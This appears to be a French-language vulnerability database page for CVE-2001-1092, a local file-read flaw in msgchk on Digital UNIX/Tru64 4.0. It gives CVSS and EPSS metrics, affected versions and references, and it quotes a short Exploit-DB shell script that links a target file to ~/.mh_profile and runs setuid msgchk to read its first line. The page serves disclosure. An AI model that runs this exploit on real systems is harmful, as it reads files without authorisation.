CVE-2001-1092 : Détail

CVE-2001-1092

0.09%V3
Local
2002-03-15
04h00 +00:00
2017-12-18
20h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

msgchk in Digital UNIX 4.0G and earlier allows a local user to read the first line of arbitrary files via a symlink attack on the .mh_profile file.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 2.1 AV:L/AC:L/Au:N/C:P/I:N/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 21107

Date de publication : 2001-09-09 22h00 +00:00
Auteur : seo
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/3320/info The msgchk utility under certain versions of Digital Unix contains an information disclosure vulnerability which could yield root privilege. Because msgchk fails to check file permissions before opening user configuration files in the user's home directory, a symbolic link to a target file can permit a local user to read the first line of data contained in any file readable by the msgchk user. Where msgchk is run setuid root, this allows limited information to be read from any file on the host. ++ msgchkx.sh #!/bin/sh # truefinder, seo@igrus.inha.ac.kr # msgchk file read vulnerability if [ ! -f $1 ] then echo "usage : $0 <file path>" fi cd ~ ln -sf $1 ~/.mh_profile /usr/bin/mh/msgchk

Products Mentioned

Configuraton 0

Compaq>>Tru64 >> Version 4.0d

Compaq>>Tru64 >> Version 4.0e

Compaq>>Tru64 >> Version 4.0f

Compaq>>Tru64 >> Version 4.0g

Références

http://www.securityfocus.com/archive/1/213238
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.kb.cert.org/vuls/id/440539
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/bid/3320
Tags : vdb-entry, x_refsource_BID